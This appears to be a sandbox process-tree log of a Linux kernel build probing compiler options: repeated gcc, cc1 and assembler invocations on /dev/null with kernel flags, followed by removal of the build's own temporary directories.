/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1765/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-protector-strong -fstack-clash-protection -o /tmp/ccgcV6s3.s5⤵PID:1768
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1765/tmp /tmp/ccgcV6s3.s5⤵PID:1769
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1765/tmp /tmp/ccgcV6s3.s5⤵PID:1769
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1765/tmp /tmp/ccgcV6s3.s5⤵PID:1769
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1765/tmp /tmp/ccgcV6s3.s5⤵PID:1769
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17654⤵PID:1770
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wunused-but-set-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-but-set-variable\"; else echo \"\"; fi"3⤵PID:1771
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17714⤵PID:1772
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wunused-but-set-variable -c -x c /dev/null -o /tmp/a/.tmp_1771/tmp4⤵PID:1773
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1771/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wunused-but-set-variable "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-protector-strong -fstack-clash-protection -o /tmp/ccaTt29I.s5⤵
- Writes file to tmp directory
PID:1774
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1771/tmp /tmp/ccaTt29I.s5⤵PID:1775
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1771/tmp /tmp/ccaTt29I.s5⤵PID:1775
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1771/tmp /tmp/ccaTt29I.s5⤵PID:1775
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1771/tmp /tmp/ccaTt29I.s5⤵
- Writes file to tmp directory
PID:1775
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17714⤵PID:1776
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-const-variable\"; else echo \"\"; fi"3⤵PID:1777
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17774⤵PID:1778
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o /tmp/a/.tmp_1777/tmp4⤵
- Writes file to tmp directory
PID:1779 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1777/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=2" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fstack-protector-strong -fstack-clash-protection -o /tmp/cco1AAj1.s5⤵PID:1780
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1777/tmp /tmp/cco1AAj1.s5⤵PID:1781
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1777/tmp /tmp/cco1AAj1.s5⤵PID:1781
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1777/tmp /tmp/cco1AAj1.s5⤵PID:1781
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1777/tmp /tmp/cco1AAj1.s5⤵PID:1781
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17774⤵PID:1782
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -Wdangling-pointer -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-dangling-pointer\"; else echo \"\"; fi"3⤵PID:1783
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17834⤵PID:1784
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -Wdangling-pointer -c -x c /dev/null -o /tmp/a/.tmp_1783/tmp4⤵PID:1785
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17834⤵PID:1786
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -fno-stack-clash-protection\"; else echo \"\"; fi"3⤵PID:1787
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17874⤵PID:1788
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -c -x c /dev/null -o /tmp/a/.tmp_1787/tmp4⤵
- Writes file to tmp directory
PID:1789 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1787/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccj9UGgT.s5⤵PID:1790
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1787/tmp /tmp/ccj9UGgT.s5⤵PID:1791
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1787/tmp /tmp/ccj9UGgT.s5⤵PID:1791
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1787/tmp /tmp/ccj9UGgT.s5⤵PID:1791
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1787/tmp /tmp/ccj9UGgT.s5⤵PID:1791
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17874⤵PID:1792
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -mfentry -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1793
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17934⤵PID:1794
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -mfentry -c -x c /dev/null -o /tmp/a/.tmp_1793/tmp4⤵
- Writes file to tmp directory
PID:1795 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1793/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/cc9e3E3E.s5⤵
- Writes file to tmp directory
PID:1796
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1793/tmp /tmp/cc9e3E3E.s5⤵PID:1797
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1793/tmp /tmp/cc9e3E3E.s5⤵PID:1797
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1793/tmp /tmp/cc9e3E3E.s5⤵PID:1797
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1793/tmp /tmp/cc9e3E3E.s5⤵PID:1797
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17934⤵PID:1798
-
-
-
/usr/bin/gccgcc "-print-file-name=include"3⤵PID:1799
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-truncation\"; else echo \"\"; fi"3⤵PID:1800
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18004⤵PID:1801
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races "-Wframe-larger-than=1024" -fstack-protector-strong "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o /tmp/a/.tmp_1800/tmp4⤵PID:1802
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D CC_USING_FENTRY /dev/null -quiet -dumpdir /tmp/a/.tmp_1800/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" -mrecord-mcount -mfentry "-march=x86-64" -g -gdwarf-5 -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=5" -Wno-main -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fno-allow-store-data-races -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -fstack-protector-strong -o /tmp/ccOCKsRB.s5⤵PID:1803
-
-
/usr/local/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1800/tmp /tmp/ccOCKsRB.s5⤵PID:1804
-
-
/usr/local/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1800/tmp /tmp/ccOCKsRB.s5⤵PID:1804
-
-
/usr/sbin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1800/tmp /tmp/ccOCKsRB.s5⤵PID:1804
-
-
/usr/bin/asas --gdwarf-5 --64 -o /tmp/a/.tmp_1800/tmp /tmp/ccOCKsRB.s5⤵PID:1804
-
-
